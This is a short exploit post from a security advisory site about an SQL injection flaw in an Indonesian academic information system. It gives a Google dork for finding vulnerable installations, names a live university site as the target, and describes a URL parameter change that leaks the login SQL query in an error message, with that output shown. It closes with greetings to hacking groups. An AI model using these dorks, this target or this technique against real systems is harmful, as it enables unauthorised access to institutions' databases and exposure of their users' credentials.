Sistem Informasi Akademik SQL Injection

2019.01.31
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Sistem Informasi Akademik SQL Injection # Dork: inurl:?mnux=login # Date: 2019-01-31 # Type: Low # Exploit Author: L4663r666h05t - RebellionGhost # Vendor Homepage: N/A # Tested on: Windows 10 x64 Dorking on google : inurl:mnux?=login or you can open this page: Live Target: http://sisfo193.unisma.ac.id/?mnux=login Change "?mnux=login" into "?mnux=loginprc&BypassMenu=1" Output: Gagal: select * from where Login='' and LevelID = '' and KodeID = 'UNISMA' and NA = 'N' and Password=LEFT(PASSWORD(''),10) limit 1 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where Login='' and LevelID = '' and KodeID = 'UNISMA' and NA' at line 2 Screenshot: http://prntscr.com/meje0q Thanks to: ManadoGhost - RebellionGhost - ExploiterID - Berandal - Mr.Vendetta_404 - KID2ZON3 - Vlyn - Indonesia Cyber Freedom - All Indonesian Haxor


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top